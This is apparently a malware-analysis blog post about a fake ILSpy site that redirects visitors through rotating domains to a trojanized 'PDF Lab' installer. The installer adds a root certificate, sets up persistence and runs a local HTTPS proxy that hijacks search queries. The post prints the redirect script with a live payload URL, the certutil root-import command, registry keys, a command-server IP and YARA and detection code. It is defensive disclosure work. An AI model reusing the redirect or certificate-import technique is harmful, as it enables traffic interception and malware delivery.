# Fake ILSpy Site Delivers Search-Hijacking Malware

## Overview

Someone registered **ilspy.org** (the real site is **ilspy.net**) and is using it to push malware at .NET developers and security researchers via a Traffic Distribution System (TDS). The network rotates payloads, so a visitor may receive a different app or browser extension.

This post covers one downloaded payload: a trojanized PDF tool called PDF Lab that installs a local HTTPS interception proxy and silently hijacks search traffic across virtually every major search engine.

## Infection Chain

### Typosquat Landing Page

The campaign starts at ilspy.org, a fake site impersonating the ILSpy project. It currently appears as the second search result for the keyword "ILSpy".

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2Fog4p3awkX1Yb13LiRwsy%2Fimage.png?alt=media&#x26;token=e0b4f174-83f0-481f-956b-4645be48f31d" alt=""><figcaption></figcaption></figure>

The real **ilspy.net** simply redirects to the project's GitHub page; ilspy.org instead hosts a standalone website pretending to be the official one. Any click anywhere on the page triggers a redirect; no specific button needs to be pressed.

According to the Wayback Machine, the site was already active by December 9, 2025, giving this campaign at least a four-month run at the time of writing.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FUmT009Bfpv9XDBBeftZh%2Fimage.png?alt=media&#x26;token=2af11e24-ea94-49ed-a61d-6ad024fd0d1b" alt=""><figcaption></figcaption></figure>

### Redirect via Traffic Distribution System

The victim is redirected to an intermediate domain, which acts as a Traffic Distribution System (TDS). This gateway infrastructure has rotated across multiple domains over the campaign's lifetime, based on Wayback Machine snapshots of **ilspy.org**:

| Domains                |
| ---------------------- |
| oundhertobeconsist.org |
| unpracticalwhich.org   |
| derwaistthatheha.org   |
| edshookherhead.org     |
| atytentioniaukmla.org  |
| bycathyhoughsheu.org   |
| sehinkitwkuou.org      |
| onalskillsexkce.org    |

All share the same pattern: a random-looking `.org` domain serving nothing but a JavaScript redirect.

```html
<!DOCTYPE html>
<html>
<head>
  <meta name="referrer" content="no-referrer" />
  <script type="text/javascript">
    window.location.href = "https://blazingapss8.cfd/app/9/?clickid=8363797469683014935&filename=";
  </script>
</head>
</html>
```
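Triage logic for pages of this shape, added here as an example and not part of the original post: it parses an HTML body, flags a page that renders no visible text and only assigns `location`, and reports the destination host and whether the referrer is suppressed. Both inputs are constructed: the gate mirrors the snippet above, the benign page is invented.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed copy of the redirect gate shown above; same structure as the page's sample.
TDS_GATE_HTML = """<!DOCTYPE html><html><head>
<meta name="referrer" content="no-referrer" />
<script type="text/javascript">
  window.location.href = "https://blazingapss8.cfd/app/9/?clickid=8363797469683014935&filename=";
</script></head></html>"""

# Constructed benign page: has visible content and no client-side redirect.
BENIGN_HTML = '<html><body><h1>ILSpy</h1><p><a href="https://github.com/icsharpcode/ILSpy">GitHub</a></p></body></html>'

# location assignments and location.replace()/assign() calls with a string-literal target
REDIRECT_RE = re.compile(r"""location(?:\.href\s*=|\s*=|\.(?:replace|assign)\()\s*["']([^"']+)["']""", re.I)


class _GateParser(HTMLParser):
    # collects script bodies, visible (non-script) text and the meta referrer policy
    def __init__(self):
        super().__init__()
        self.scripts, self.visible, self.referrer, self._in_script = [], [], None, False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "meta" and (a.get("name") or "").lower() == "referrer":
            self.referrer = (a.get("content") or "").lower()

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.scripts if self._in_script else self.visible).append(data.strip())


def classify_redirect_gate(html: str) -> dict:
    """Flag pages that render nothing and only forward the browser; report where they send it."""
    p = _GateParser()
    p.feed(html)
    p.close()
    m = REDIRECT_RE.search("\n".join(p.scripts))
    dest = m.group(1) if m else None
    return {
        "is_redirect_gate": dest is not None and not any(p.visible),
        "destination": dest,
        "destination_host": urlparse(dest).hostname if dest else None,
        "hides_referrer": p.referrer == "no-referrer",
    }
```

Pointing a crawler at a suspected gate and logging `destination_host` over time is how the rotation of the `.org` domains in the table above becomes visible.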

### Malware Download

The final payload is downloaded from:

```
https://blazingapss8.cfd/app/9/?clickid=8363797469683014935&filename=
```

The installer (App.exe) drops a number of files:

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2F6q1lULTA9vhvxZUODH4t%2Fimage.png?alt=media&#x26;token=24b5881c-1e47-468d-b58c-a1b354cac87b" alt=""><figcaption></figcaption></figure>

Of all these files, two are worth a closer look:

| File               | Purpose                                    |
| ------------------ | ------------------------------------------ |
| PDFLabApp.dll      | Trojanized PDF tool                        |
| PDFLabWatchdog.dll | Evidence cleanup / anti-forensics watchdog |

## Technical Analysis

### App.exe

`App.exe` is an Inno Setup installer. Beyond dropping the main components and all necessary libraries, it silently handles three things in the background while the victim sees a normal installation flow:

* Installs **.NET Desktop Runtime 7.0.20** with `/quiet /norestart`
* Imports `rootCert.pfx` into the Windows trusted root certificate store using `certutil.exe`
  * `"certutil.exe" -f -p "" -importPFX Root "C:\Program Files (x86)\PDF Lab\rootCert.pfx"`
* Writes both Run keys for persistence
  * `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLabWatchdog`
  * `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLab`

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2F2zQwb4uYpnM0wAqjZkXk%2Fimage.png?alt=media&#x26;token=33c70db7-3ea4-4eb8-b9ad-389457f387e2" alt=""><figcaption></figcaption></figure>

### PDFLabApp.dll

The malware installs a functional PDF utility called PDF Lab.

The application presents a real UI with working features including Merge PDF, Split PDF, Compress PDF, and Protect PDF.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FIQbssjEPS2evSaBYSWl3%2Fimage.png?alt=media&#x26;token=fc3a135d-4cea-45da-ae78-55145bc0a18f" alt=""><figcaption></figcaption></figure>

#### Remote Kill Switch and Telemetry

The main entry point uses a named mutex (`GoogleSearchRedirect_SingleInstance`) to enforce a single running instance. More significantly, it implements a **run counter**: every 10th launch, it connects to a hardcoded SQL Server instance at `216.219.86.206` before allowing the application to proceed.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FKxnQrBf8tCP0sYjGjIFk%2Fimage.png?alt=media&#x26;token=fccf0182-ce46-4be1-a5c2-645a96b38383" alt=""><figcaption></figcaption></figure>

Two operations are run against this remote database.

The first looks like a **kill switch check**. It queries the `AppRunState` table for a `KeepAppRunning` boolean. If this is set to false, the application exits immediately.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FL80bgf19n59kov9GdRDE%2Fimage.png?alt=media&#x26;token=4de3b518-152f-400c-b5df-f9d9417b05d0" alt=""><figcaption></figcaption></figure>

The second is **telemetry.** It updates `AppInstances`, incrementing a `LifetimeInstanceCount` and recording the last `StartupTime`.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2Fjj4QgHDlTyF288CfwBes%2Fimage.png?alt=media&#x26;token=ce970845-1754-415a-ba7c-8683c3a090d7" alt=""><figcaption></figcaption></figure>

The database credentials are hardcoded in the binary in plaintext:

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FNWCPto5czQEePHnfCcr2%2Fimage.png?alt=media&#x26;token=ad0a91e9-f34f-4858-9f7a-821b2c90fb9f" alt=""><figcaption></figcaption></figure>

#### HTTPS Interception Proxy

The most significant component is an HTTPS man-in-the-middle proxy built using the **Titanium.Web.Proxy** library, listening on **localhost:18234**. This is what performs the actual search hijacking.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FOJKuG3AhKsDvIsDv2F8O%2Fimage.png?alt=media&#x26;token=fcc74228-5feb-463d-9822-8e263c4617cf" alt=""><figcaption></figcaption></figure>

With the root certificate already installed by the installer, the proxy can decrypt and manipulate HTTPS traffic without warnings. The malware changes Windows system proxy settings to route all browser traffic through it, saving the victim's original proxy configuration first for cleanup later.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2Fh3y0vmblYMlspgLbZj2O%2Fimage.png?alt=media&#x26;token=54c30784-3e7c-4e1f-8ca9-e56c069d6880" alt=""><figcaption></figcaption></figure>
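Detection logic for the installer actions listed under App.exe together with the proxy change described here, added as an example and not the author's or the malware's code: it flags a `certutil -importPFX` into the Root store, Run-key writes and a system `ProxyServer` pointing at a loopback listener, then correlates the root import and the loopback proxy into an interception-chain verdict. The events are constructed Sysmon-style records; the Run-key values are placeholders, since the post does not show what the keys point to.

```python
import re

# Constructed Sysmon-style events modelled on the behaviour described above; not real telemetry.
# The Run-key values are placeholders; the page does not show what the keys point to.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'"certutil.exe" -f -p "" -importPFX Root "C:\Program Files (x86)\PDF Lab\rootCert.pfx"'},
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLab", "value": "<placeholder>"},
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLabWatchdog", "value": "<placeholder>"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", "value": "1"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer",
     "value": "http=127.0.0.1:18234;https=127.0.0.1:18234"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},  # benign
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.I)
PROXY_SERVER_RE = re.compile(r"\\Internet Settings\\ProxyServer$", re.I)
# one "host:port" or "scheme=host:port" entry of a ProxyServer value, loopback hosts only
LOOPBACK_RE = re.compile(r"^(?:\w+=)?(?:127\.0\.0\.1|localhost|\[::1\]):(\d+)$", re.I)


def analyse(events):
    """Return (severity, kind, detail) findings for the three installer/proxy behaviours."""
    findings = []
    for e in events:
        if e["type"] == "process" and e["image"].lower().endswith("certutil.exe"):
            cl = e["cmdline"].lower()
            # -importPFX into the Root store adds a trust anchor: the precondition for warning-free HTTPS MITM
            if "-importpfx" in cl and re.search(r"\broot\b", cl):
                findings.append(("high", "root_import", e["cmdline"]))
        elif e["type"] == "registry":
            if RUN_KEY_RE.search(e["key"]):
                findings.append(("medium", "run_key", e["key"]))
            elif PROXY_SERVER_RE.search(e["key"]):
                for entry in e["value"].split(";"):
                    m = LOOPBACK_RE.match(entry.strip())
                    if m:  # browser traffic is being routed to a local listener
                        sev = "high" if m.group(1) == "18234" else "medium"
                        findings.append((sev, "loopback_proxy", entry.strip()))
                        break
    return findings


def interception_chain_present(findings):
    """True when a fresh root CA and a loopback system proxy were both seen: the setup described above."""
    kinds = {kind for _, kind, _ in findings}
    return {"root_import", "loopback_proxy"} <= kinds
```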

#### Search Engine Coverage

The proxy intercepts search queries across an exhaustive list of search engines, covering virtually every major platform and every regional Google TLD worldwide:

* **Western engines:** Google (191 TLDs), Bing, Yahoo, DuckDuckGo, Brave, Startpage, Ecosia, AOL, Ask
* **Eastern engines:** Yandex, Baidu, Naver, Sogou
* **Plus all regional Google domains** from google.ad to google.co.zw

Any search query matching these patterns is intercepted and redirected to `pdflab.gg/search`, which in turn forwards the victim to `doktox.com`, a search engine branded as "Blaze".

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FHlukwOLim0fYmvsJg40c%2Fimage.png?alt=media&#x26;token=84b06b54-6325-43da-bd3f-1e86ed1202c7" alt=""><figcaption></figcaption></figure>

For example, a search for "ilspy decompiler" gets redirected to `https://pdflab.gg/search?q=ilspy+decompiler`, which then redirects the victim to `https://doktox.com/q/pdflab?q=ilspy+decompiler`.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FsQGv3t48ixP7DMkWbZne%2Fimage.png?alt=media&#x26;token=60e8f0e4-893b-4359-98ac-4f9e092cf89c" alt=""><figcaption></figcaption></figure>

### PDFLabWatchdog.dll

The watchdog process serves two purposes: **evidence cleanup** and **anti-forensics**.

It sleeps for 120 seconds and then, every 5 seconds, checks two conditions:

1. Is `PDFLabApp.exe` currently running?
2. Is the Windows proxy currently set to port 18234?

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2Ff0cJuUDip2G7BB9BTR1q%2Fimage.png?alt=media&#x26;token=83e544af-3a81-400c-9f4f-f68629f63f86" alt=""><figcaption></figcaption></figure>

If PDFLabApp is **not** running but the malicious proxy is **still configured**, it restores the victim's original proxy settings from `HKCU\Software\GoogleSearchRedirect\OriginalProxy` and then **deletes the entire** `GoogleSearchRedirect` registry subtree.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FD2pVdGmGDQ4JHhcW7Gc5%2Fimage.png?alt=media&#x26;token=3a5f874f-a43b-4edf-97f3-1cca84187b73" alt=""><figcaption></figcaption></figure>

#### Anti-Debug and Anti-Profiling Module

* **Profiler detection:** If the `COR_ENABLE_PROFILING` environment variable equals `1` (set by .NET profiling tools), `Environment.FailFast()` is called immediately.
* **Debugger watchdog:** A background thread polls `Debugger.IsAttached` and `Debugger.IsLogging()` in a loop. Either condition triggers an immediate hard crash.
* **Mutual watchdog:** The main thread and the monitor thread watch each other. Killing the monitor thread causes the process to crash too, preventing simple thread termination as a bypass.

<figure><img src="https://4069425012-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F12elyPkuEyHFCpdz9XE2%2Fuploads%2FnZucSAQChZL6Qqh3wR1r%2Fimage.png?alt=media&#x26;token=71596ee3-57db-4f2b-b1eb-1a69c3998eb9" alt=""><figcaption></figcaption></figure>

## PDB Path and GitHub Repository

The binary contains an embedded PDB record that was not stripped before distribution, leaking both the developer's local path and a raw GitHub URL pointing to the source:

```json
{"documents":{"D:\\Dev\\PDFLab\\PDFLabAppWithProxy\\*":
"https://raw.githubusercontent.com/OmarNegm/PDFLabApp/9fa6add51f24128df6706dce5c426fbe1b7015f0/*"}}
```

## IOCs



| Registry IOCs                                                       |
| ------------------------------------------------------------------- |
| `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLab`         |
| `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLabWatchdog` |
| `HKCU\Software\GoogleSearchRedirect`                                |
| `HKCU\Software\GoogleSearchRedirect\OriginalProxy`                  |

### YARA Rules

{% code overflow="wrap" %}

```yara
rule pdflabapp
{
    meta:
        author = "miltinh0c"
        date = "2026-04-07"
        description = "Detects the HTTPS proxy search hijacker used in PDFLabApp."
    strings:
        $search_redirect_url = "pdflab.gg/search" ascii wide

        $root_cert_name = "Titanium Root Certificate Authority" ascii wide
        $library_titanium = "Titanium.Web.Proxy" ascii wide

        $reg_google_redirect_key = "Software\\GoogleSearchRedirect" ascii wide
        $reg_internet_settings = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii wide

        $zero_width_space = { E2 80 8B }
        $zero_width_nonjoiner = { E2 80 8C }
    condition:
        uint16(0) == 0x5A4D
        and $root_cert_name
        and $reg_google_redirect_key
        and $reg_internet_settings
        and $search_redirect_url
        and $library_titanium
        and 1 of ($zero_width_space, $zero_width_nonjoiner)
}
```

{% endcode %}

{% code overflow="wrap" %}

```yara
rule pdflabapp_watchdog
{
    meta:
        author = "miltinh0c"
        date = "2026-04-07"
        description = "Detects the PDFLabWatchdog cleanup process."
    strings:
        $process = "PDFLabApp" ascii wide

        $reg_google_redirect_key = "Software\\GoogleSearchRedirect" ascii wide
        $reg_original = "Software\\GoogleSearchRedirect\\OriginalProxy" ascii wide
        $reg_internet_settings = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii wide

        $proxy_enable = "ProxyEnable" ascii wide
        $proxy_server = "ProxyServer" ascii wide
        $proxy_override = "ProxyOverride" ascii wide

        $import_winnet = "wininet.dll" ascii wide
        $internet_set_option = "InternetSetOption" ascii wide

        $zero_width_space = { E2 80 8B }
        $zero_width_nonjoiner = { E2 80 8C }
    condition:
        uint16(0) == 0x5A4D
        and $process
        and $reg_google_redirect_key
        and $reg_internet_settings
        and $import_winnet
        and $internet_set_option
        and 2 of ($proxy_enable, $proxy_server, $proxy_override, $reg_original)
        and 1 of ($zero_width_space, $zero_width_nonjoiner)
}
```

{% endcode %}
